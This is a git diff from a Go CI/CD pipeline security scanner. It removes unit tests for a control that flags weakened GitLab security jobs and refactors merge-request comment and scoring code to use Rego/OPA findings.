- AllowFailureCheck: false,
- RulesCheck: false,
- WhenManualCheck: false,
- }
- data := buildSecurityJobsPipelineData(nil, nil, nil)
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when all sub-controls disabled")
- }
-}
-
-func TestSecurityJobsWeakened_CiInvalid(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- WhenManualCheck: true,
- }
- data := &collector.GitlabPipelineOriginData{
- CiValid: false,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 for invalid CI, got %v", result.Compliance)
- }
-}
-
-func TestSecurityJobsWeakened_NoSecurityJobs(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- WhenManualCheck: true,
- }
- mergedJobs := map[string]interface{}{
- "build": map[interface{}]interface{}{
- "script": "echo build",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control to run, not be skipped")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when no security jobs found, got %v", result.Compliance)
- }
- if result.Metrics.SecurityJobsFound != 0 {
- t.Fatalf("expected 0 security jobs found, got %d", result.Metrics.SecurityJobsFound)
- }
-}
-
-func TestSecurityJobsWeakened_AllowFailureTrue(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"*-sast"},
- AllowFailureCheck: true,
- RulesCheck: false,
- WhenManualCheck: false,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "allow_failure": true,
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].SubControl != "allowFailureMustBeFalse" {
- t.Fatalf("expected sub-control allowFailureMustBeFalse, got %s", result.Issues[0].SubControl)
- }
- if result.Issues[0].JobName != "semgrep-sast" {
- t.Fatalf("expected job semgrep-sast, got %s", result.Issues[0].JobName)
- }
-}
-
-func TestSecurityJobsWeakened_AllowFailureFalse_NoIssue(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"*-sast"},
- AllowFailureCheck: true,
- RulesCheck: false,
- WhenManualCheck: false,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "allow_failure": false,
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected 0 issues, got %d", len(result.Issues))
- }
-}
-
-func TestSecurityJobsWeakened_WhenManual(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"container_scanning"},
- AllowFailureCheck: false,
- RulesCheck: false,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "container_scanning": map[interface{}]interface{}{
- "script": "/analyzer run",
- "when": "manual",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].SubControl != "whenMustNotBeManual" {
- t.Fatalf("expected sub-control whenMustNotBeManual, got %s", result.Issues[0].SubControl)
- }
-}
-
-func TestSecurityJobsWeakened_RulesWhenNever(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"secret_detection"},
- AllowFailureCheck: false,
- RulesCheck: true,
- WhenManualCheck: false,
- }
-
- mergedJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- rawJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "rules": []interface{}{
- map[interface{}]interface{}{
- "when": "never",
- },
- },
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, rawJobs, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].SubControl != "rulesMustNotBeRedefined" {
- t.Fatalf("expected sub-control rulesMustNotBeRedefined, got %s", result.Issues[0].SubControl)
- }
- if result.Issues[0].JobName != "secret_detection" {
- t.Fatalf("expected job secret_detection, got %s", result.Issues[0].JobName)
- }
-}
-
-func TestSecurityJobsWeakened_RulesWhenManual(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"secret_detection"},
- AllowFailureCheck: false,
- RulesCheck: true,
- WhenManualCheck: false,
- }
-
- mergedJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- rawJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "rules": []interface{}{
- map[interface{}]interface{}{
- "when": "manual",
- "allow_failure": true,
- },
- },
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, rawJobs, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
-}
-
-func TestSecurityJobsWeakened_NoPatterns(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{},
- AllowFailureCheck: false,
- RulesCheck: false,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "when": "manual",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Metrics.SecurityJobsFound != 0 {
- t.Fatalf("expected 0 security jobs when no patterns configured, got %d", result.Metrics.SecurityJobsFound)
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when no patterns configured, got %v", result.Compliance)
- }
-}
-
-func TestSecurityJobsWeakened_MultiplePatternMatches(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"*-sast", "semgrep-*"},
- AllowFailureCheck: false,
- RulesCheck: false,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "when": "manual",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- // Job matches both patterns but should only appear once
- if result.Metrics.SecurityJobsFound != 1 {
- t.Fatalf("expected 1 security job (deduped), got %d", result.Metrics.SecurityJobsFound)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
-}
-
-func TestSecurityJobsWeakened_MultipleSubControlIssues(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"*-sast", "container_scanning", "secret_detection"},
- AllowFailureCheck: true,
- RulesCheck: true,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "allow_failure": true,
- },
- "container_scanning": map[interface{}]interface{}{
- "script": "/analyzer run",
- "when": "manual",
- },
- "secret_detection": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- rawJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "rules": []interface{}{
- map[interface{}]interface{}{
- "when": "never",
- },
- },
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, rawJobs, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 3 {
- t.Fatalf("expected 3 issues, got %d", len(result.Issues))
- }
- if result.Metrics.WeakenedJobs != 3 {
- t.Fatalf("expected 3 weakened jobs, got %d", result.Metrics.WeakenedJobs)
- }
-}
-
-func TestSecurityJobsWeakened_CleanConfig(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"*-sast", "secret_detection"},
- AllowFailureCheck: true,
- RulesCheck: true,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "allow_failure": false,
- "when": "on_success",
- },
- "secret_detection": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected 0 issues, got %d", len(result.Issues))
- }
- if result.Metrics.SecurityJobsFound != 2 {
- t.Fatalf("expected 2 security jobs found, got %d", result.Metrics.SecurityJobsFound)
- }
-}
-
-func TestSecurityJobsWeakened_WildcardPatterns(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"gemnasium-*"},
- AllowFailureCheck: false,
- RulesCheck: false,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "gemnasium-dependency_scanning": map[interface{}]interface{}{
- "script": "/analyzer run",
- "when": "manual",
- },
- "gemnasium-maven-dependency_scanning": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Metrics.SecurityJobsFound != 2 {
- t.Fatalf("expected 2 security jobs, got %d", result.Metrics.SecurityJobsFound)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].JobName != "gemnasium-dependency_scanning" {
- t.Fatalf("expected job gemnasium-dependency_scanning, got %s", result.Issues[0].JobName)
- }
-}
-
-func TestSecurityJobsWeakened_RulesCheckUsesJobHardcodedContent(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"secret_detection"},
- AllowFailureCheck: false,
- RulesCheck: true,
- WhenManualCheck: false,
- }
-
- mergedJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- // Raw conf does NOT have the job, but JobHardcodedContent does
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
- data.JobHardcodedContent["secret_detection"] = map[interface{}]interface{}{
- "rules": []interface{}{
- map[interface{}]interface{}{
- "when": "never",
- },
- },
- }
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
-}
-
-func TestIsAllowFailureTrue(t *testing.T) {
- tests := []struct {
- name string
- input interface{}
- want bool
- }{
- {"nil", nil, false},
- {"bool true", true, false}, // direct bool in test context
- {"bool false", false, false}, // not flagged
- {"string true", "true", true},
- {"string false", "false", false},
- {"map with exit_codes", map[interface{}]interface{}{"exit_codes": []int{1}}, true},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- got := isAllowFailureTrue(tt.input)
- // For the "bool true" case, the function should return true
- if tt.name == "bool true" {
- if !got {
- t.Fatalf("isAllowFailureTrue(true) = false, want true")
- }
- return
- }
- if got != tt.want {
- t.Fatalf("isAllowFailureTrue(%v) = %v, want %v", tt.input, got, tt.want)
- }
- })
- }
-}
-
-func TestIsWhenManual(t *testing.T) {
- tests := []struct {
- input interface{}
- want bool
- }{
- {nil, false},
- {"manual", true},
- {"Manual", true},
- {" manual ", true},
- {"on_success", false},
- {"always", false},
- {42, false},
- }
-
- for _, tt := range tests {
- got := isWhenManual(tt.input)
- if got != tt.want {
- t.Fatalf("isWhenManual(%v) = %v, want %v", tt.input, got, tt.want)
- }
- }
-}
-
-func TestMatchesAnyPattern(t *testing.T) {
- tests := []struct {
- jobName string
- patterns []string
- want bool
- }{
- {"semgrep-sast", []string{"*-sast"}, true},
- {"bandit-sast", []string{"*-sast"}, true},
- {"secret_detection", []string{"secret_detection"}, true},
- {"container_scanning", []string{"container_scanning"}, true},
- {"gemnasium-dependency_scanning", []string{"gemnasium-*"}, true},
- {"dast_api", []string{"dast_*"}, true},
- {"build", []string{"*-sast", "secret_detection"}, false},
- {"my-sast-job", []string{"*-sast"}, false},
- }
-
- for _, tt := range tests {
- t.Run(tt.jobName, func(t *testing.T) {
- got := matchesAnyPattern(tt.jobName, tt.patterns)
- if got != tt.want {
- t.Fatalf("matchesAnyPattern(%q, %v) = %v, want %v", tt.jobName, tt.patterns, got, tt.want)
- }
- })
- }
-}
diff --git a/control/mrcomment.go b/control/mrcomment.go
index 4d8eeab..9aeba3b 100644
--- a/control/mrcomment.go
+++ b/control/mrcomment.go
@@ -22,6 +22,7 @@ func ManageMergeRequestComment(
projectID int,
mrIID int,
result *AnalysisResult,
+ pc *configuration.PlumberConfig,
compliance float64,
threshold float64,
conf *configuration.Configuration,
@@ -36,7 +37,7 @@ func ManageMergeRequestComment(
})
// Generate comment body
- commentBody := generateMRComment(result, compliance, threshold, score, scoreMode, scorePointMode)
+ commentBody := generateMRComment(result, pc, compliance, threshold, score, scoreMode, scorePointMode)
// List existing notes to find our comment
notes, err := gitlab.ListMergeRequestNotes(
@@ -129,7 +130,7 @@ func ScoreBadgeURL(letter string) string {
// generateMRComment builds the Markdown body for the merge request comment
// based on the analysis result.
-func generateMRComment(result *AnalysisResult, compliance, threshold float64, score *PlumberScoreResult, scoreMode, scorePointMode bool) string {
+func generateMRComment(result *AnalysisResult, pc *configuration.PlumberConfig, compliance, threshold float64, score *PlumberScoreResult, scoreMode, scorePointMode bool) string {
var b strings.Builder
// Hidden identifier so we can find this comment later
@@ -164,7 +165,10 @@ func generateMRComment(result *AnalysisResult, compliance, threshold float64, sc
fmt.Fprintf(&b, "- **Score:** **%s**\n\n", score.Score)
}
- // Gather controls
+ // Gather controls from the config-driven catalog joined with the
+ // Rego Findings list. Compliance is binary per control (100% when
+ // no finding matches, 0% otherwise); skipped status comes from
+ // .plumber.yaml.
type controlEntry struct {
name string
compliance float64
@@ -172,97 +176,19 @@ func generateMRComment(result *AnalysisResult, compliance, threshold float64, sc
skipped bool
}
+ findingsByControl := FindingsByControl(result.Findings)
var controls []controlEntry
var totalIssues int
- if r := result.ImageForbiddenTagsResult; r != nil {
- name := "Container images must not use forbidden tags"
- if r.MustBePinnedByDigest {
- name = "Container images must be pinned by digest"
+ for _, e := range GitLabControls(pc) {
+ count := len(findingsByControl[e.ControlName])
+ ctrlCompliance := 100.0
+ if !e.Skipped && count > 0 {
+ ctrlCompliance = 0.0
}
- controls = append(controls, controlEntry{name, r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.ImageAuthorizedSourcesResult; r != nil {
- controls = append(controls, controlEntry{"Container images must come from authorized sources", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.BranchProtectionResult; r != nil {
- controls = append(controls, controlEntry{"Branch must be protected", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.HardcodedJobsResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not include hardcoded jobs", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.OutdatedIncludesResult; r != nil {
- controls = append(controls, controlEntry{"Includes must be up to date", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.ForbiddenVersionsIncludesResult; r != nil {
- controls = append(controls, controlEntry{"Includes must not use forbidden versions", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.RequiredComponentsResult; r != nil {
- issueCount := len(r.Issues) + len(r.OverriddenIssues)
- controls = append(controls, controlEntry{"Pipeline must include required components", r.Compliance, issueCount, r.Skipped})
- if !r.Skipped {
- totalIssues += issueCount
- }
- }
- if r := result.RequiredTemplatesResult; r != nil {
- issueCount := len(r.Issues) + len(r.OverriddenIssues)
- controls = append(controls, controlEntry{"Pipeline must include required templates", r.Compliance, issueCount, r.Skipped})
- if !r.Skipped {
- totalIssues += issueCount
- }
- }
- if r := result.DebugTraceResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not enable debug trace", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.VariableInjectionResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not use unsafe variable expansion", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.SecurityJobsWeakenedResult; r != nil {
- controls = append(controls, controlEntry{"Security jobs must not be weakened", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.UnverifiedScriptsResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not execute unverified scripts", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.JobVariablesOverrideResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not override job variables", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.DockerInDockerResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not use Docker-in-Docker", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
+ controls = append(controls, controlEntry{e.DisplayName, ctrlCompliance, count, e.Skipped})
+ if !e.Skipped {
+ totalIssues += count
}
}
@@ -304,175 +230,50 @@ func generateMRComment(result *AnalysisResult, compliance, threshold float64, sc
}
// writeIssueDetails appends per-control issue details into the builder.
+// Findings are grouped by the ControlName declared in the issue-code
+// registry so the section headings line up with the controls table.
+// Order within each group follows the Rego evaluation order so repeated
+// runs produce stable output.
func writeIssueDetails(b *strings.Builder, result *AnalysisResult) {
- // Forbidden tags / digest pinning
- if r := result.ImageForbiddenTagsResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- if r.MustBePinnedByDigest {
- b.WriteString("**Container images (digest pinning and forbidden tags):**\n")
- } else {
- b.WriteString("**Container images must not use forbidden tags:**\n")
- }
- for _, issue := range r.Issues {
- switch issue.Code {
- case CodeImageNotPinnedByDigest:
- fmt.Fprintf(b, "- `%s` Job `%s`: image `%s` is not pinned by digest ([docs](%s))\n", issue.Code, issue.Job, issue.Link, issue.DocURL)
- case CodeImageForbiddenTag:
- fmt.Fprintf(b, "- `%s` Job `%s`: image `%s` uses forbidden tag `%s` ([docs](%s))\n", issue.Code, issue.Job, issue.Link, issue.Tag, issue.DocURL)
- default:
- fmt.Fprintf(b, "- `%s` Job `%s`: image `%s` ([docs](%s))\n", issue.Code, issue.Job, issue.Link, issue.DocURL)
- }
- }
- b.WriteString("\n")
- }
-
- // Unauthorized images
- if r := result.ImageAuthorizedSourcesResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Container images must come from authorized sources:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` Job `%s`: unauthorized image `%s` ([docs](%s))\n", issue.Code, issue.Job, issue.Link, issue.DocURL)
- }
- b.WriteString("\n")
- }
-
- // Branch protection
- if r := result.BranchProtectionResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Branch must be protected:**\n")
- for _, issue := range r.Issues {
- if issue.Type == "unprotected" {
- fmt.Fprintf(b, "- `%s` Branch `%s` is not protected ([docs](%s))\n", issue.Code, issue.BranchName, issue.DocURL)
- } else {
- fmt.Fprintf(b, "- `%s` Branch `%s` has non-compliant protection settings ([docs](%s))\n", issue.Code, issue.BranchName, issue.DocURL)
- }
- }
- b.WriteString("\n")
- }
-
- // Hardcoded jobs
- if r := result.HardcodedJobsResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not include hardcoded jobs:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` Job `%s` is hardcoded (not from include/component) ([docs](%s))\n", issue.Code, issue.JobName, issue.DocURL)
- }
- b.WriteString("\n")
- }
-
- // Outdated includes
- if r := result.OutdatedIncludesResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Includes must be up to date:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` `%s` uses version `%s` (latest: `%s`) ([docs](%s))\n", issue.Code, issue.GitlabIncludeLocation, issue.Version, issue.LatestVersion, issue.DocURL)
- }
- b.WriteString("\n")
- }
-
- // Forbidden versions
- if r := result.ForbiddenVersionsIncludesResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Includes must not use forbidden versions:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` `%s` uses forbidden version `%s` ([docs](%s))\n", issue.Code, issue.GitlabIncludeLocation, issue.Version, issue.DocURL)
- }
- b.WriteString("\n")
- }
-
- // Required components
- if r := result.RequiredComponentsResult; r != nil && !r.Skipped && (len(r.Issues) > 0 || len(r.OverriddenIssues) > 0) {
- b.WriteString("**Pipeline must include required components:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` Missing component `%s` (group %d) ([docs](%s))\n", issue.Code, issue.ComponentPath, issue.GroupIndex+1, issue.DocURL)
- }
- for _, issue := range r.OverriddenIssues {
- fmt.Fprintf(b, "- `%s` Overridden component `%s` (group %d) ([docs](%s))\n", issue.Code, issue.ComponentPath, issue.GroupIndex+1, issue.DocURL)
- for _, job := range issue.OverriddenJobs {
- fmt.Fprintf(b, " - job `%s` overrides: `%s`\n", job.JobName, strings.Join(job.OverriddenKeys, "`, `"))
- }
- }
- b.WriteString("\n")
- }
-
- // Required templates
- if r := result.RequiredTemplatesResult; r != nil && !r.Skipped && (len(r.Issues) > 0 || len(r.OverriddenIssues) > 0) {
- b.WriteString("**Pipeline must include required templates:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` Missing template `%s` (group %d) ([docs](%s))\n", issue.Code, issue.TemplatePath, issue.GroupIndex+1, issue.DocURL)
- }
- for _, issue := range r.OverriddenIssues {
- fmt.Fprintf(b, "- `%s` Overridden template `%s` (group %d) ([docs](%s))\n", issue.Code, issue.TemplatePath, issue.GroupIndex+1, issue.DocURL)
- for _, job := range issue.OverriddenJobs {
- fmt.Fprintf(b, " - job `%s` overrides: `%s`\n", job.JobName, strings.Join(job.OverriddenKeys, "`, `"))
- }
- }
- b.WriteString("\n")
- }
-
- // Debug trace
- if r := result.DebugTraceResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not enable debug trace:**\n")
- for _, issue := range r.Issues {
- if issue.Location == "global" {
- fmt.Fprintf(b, "- `%s` `%s` = `%s` in global variables ([docs](%s))\n", issue.Code, issue.VariableName, issue.Value, issue.DocURL)
- } else {
- fmt.Fprintf(b, "- `%s` `%s` = `%s` in job `%s` ([docs](%s))\n", issue.Code, issue.VariableName, issue.Value, issue.Location, issue.DocURL)
- }
- }
- b.WriteString("\n")
- }
-
- // Variable injection
- if r := result.VariableInjectionResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not use unsafe variable expansion:**\n")
- for _, issue := range r.Issues {
- if issue.JobName == "(global)" {
- fmt.Fprintf(b, "- `$%s` used in global `%s`: `%s`\n", issue.VariableName, issue.ScriptBlock, issue.ScriptLine)
- } else {
- fmt.Fprintf(b, "- `$%s` used in job `%s` `%s`: `%s`\n", issue.VariableName, issue.JobName, issue.ScriptBlock, issue.ScriptLine)
- }
- }
- b.WriteString("\n")
- }
-
- // Security jobs weakened
- if r := result.SecurityJobsWeakenedResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Security jobs must not be weakened:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` Job `%s`: %s ([docs](%s))\n", issue.Code, issue.JobName, issue.Detail, issue.DocURL)
- }
- b.WriteString("\n")
- }
-
- // Unverified script execution
- if r := result.UnverifiedScriptsResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not execute unverified scripts:**\n")
- for _, issue := range r.Issues {
- if issue.JobName == "(global)" {
- fmt.Fprintf(b, "- `%s` Global `%s`: `%s` ([docs](%s))\n", issue.Code, issue.ScriptBlock, issue.ScriptLine, issue.DocURL)
- } else {
- fmt.Fprintf(b, "- `%s` Job `%s` `%s`: `%s` ([docs](%s))\n", issue.Code, issue.JobName, issue.ScriptBlock, issue.ScriptLine, issue.DocURL)
- }
- }
- b.WriteString("\n")
- }
-
- // Docker-in-Docker
- if r := result.DockerInDockerResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not use Docker-in-Docker:**\n")
- for _, issue := range r.Issues {
- if issue.Code == CodeDockerInDockerUsage {
- fmt.Fprintf(b, "- `%s` Job `%s` uses DinD service: `%s` ([docs](%s))\n", issue.Code, issue.JobName, issue.ServiceImage, issue.DocURL)
- } else {
- fmt.Fprintf(b, "- `%s` Job `%s`: %s ([docs](%s))\n", issue.Code, issue.JobName, issue.Detail, issue.DocURL)
- }
- }
- b.WriteString("\n")
- }
-
- // Job variable overrides
- if r := result.JobVariablesOverrideResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not override job variables:**\n")
- for _, issue := range r.Issues {
- if issue.Location == "global" {
- fmt.Fprintf(b, "- `%s` `%s` = `%s` in global variables ([docs](%s))\n", issue.Code, issue.VariableName, issue.Value, issue.DocURL)
+ findingsByControl := FindingsByControl(result.Findings)
+ // Emit groups in the registry order (the same order used by the
+ // controls table above) so the two sections align visually.
+ order := []struct {
+ controlName string
+ heading string
+ }{
+ {"containerImageMustNotUseForbiddenTags", "Container images must not use forbidden tags"},
+ {"containerImageMustComeFromAuthorizedSources", "Container images must come from authorized sources"},
+ {"branchMustBeProtected", "Branch must be protected"},
+ {"pipelineMustNotIncludeHardcodedJobs", "Pipeline must not include hardcoded jobs"},
+ {"includesMustBeUpToDate", "Includes must be up to date"},
+ {"includesMustNotUseForbiddenVersions", "Includes must not use forbidden versions"},
+ {"pipelineMustIncludeComponent", "Pipeline must include required components"},
+ {"pipelineMustIncludeTemplate", "Pipeline must include required templates"},
+ {"pipelineMustNotEnableDebugTrace", "Pipeline must not enable debug trace"},
+ {"pipelineMustNotUseUnsafeVariableExpansion", "Pipeline must not use unsafe variable expansion"},
+ {"pipelineMustNotOverrideJobVariables", "Pipeline must not override job variables"},
+ {"securityJobsMustNotBeWeakened", "Security jobs must not be weakened"},
+ {"pipelineMustNotExecuteUnverifiedScripts", "Pipeline must not execute unverified scripts"},
+ {"pipelineMustNotUseDockerInDocker", "Pipeline must not use Docker-in-Docker"},
+ {"workflowMustNotInjectUserInputInScripts", "Workflow must not inject user input in scripts"},
+ {"workflowMustNotReEnableInsecureCommands", "Workflow must not re-enable insecure commands"},
+ {"checkoutMustNotPersistCredentials", "actions/checkout must not persist credentials"},
+ {"workflowMustNotUseDangerousTriggers", "Workflow must not use dangerous triggers"},
+ {"workflowMustNotGrantPermissionsWriteAll", "Workflow must not grant write-all permissions"},
+ }
+ for _, g := range order {
+ findings := findingsByControl[g.controlName]
+ if len(findings) == 0 {
+ continue
+ }
+ fmt.Fprintf(b, "**%s:**\n", g.heading)
+ for _, f := range findings {
+ docURL := ErrorCode(f.Code).DocURL()
+ if f.Job != "" {
+ fmt.Fprintf(b, "- `%s` %s ([docs](%s))\n", f.Code, f.Message, docURL)
} else {
- fmt.Fprintf(b, "- `%s` `%s` = `%s` in job `%s` ([docs](%s))\n", issue.Code, issue.VariableName, issue.Value, issue.Location, issue.DocURL)
+ fmt.Fprintf(b, "- `%s` %s ([docs](%s))\n", f.Code, f.Message, docURL)
}
}
b.WriteString("\n")
diff --git a/control/scoring.go b/control/scoring.go
index e4c4b4b..db04d26 100644
--- a/control/scoring.go
+++ b/control/scoring.go
@@ -3,6 +3,8 @@ package control
import (
"math"
"sort"
+
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
)
// PlumberScoreProfileID identifies the scoring rules version (see docs/scoring.md).
@@ -48,86 +50,19 @@ type PlumberScoreResult struct {
Losses []SeverityLoss `json:"losses"`
}
-// forEachIssueCode invokes fn for every issue code from enabled (non-skipped) controls.
+// forEachIssueCode invokes fn for every issue code emitted by the
+// Rego/OPA rule engine. The legacy Go controls still populate their
+// per-control *Result fields in AnalysisResult for JSON backwards
+// compatibility (Phase A.2 of the refactor), but scoring and
+// aggregation read from the Rego Findings list β the single source
+// of truth now that all 19 codes are ported. See
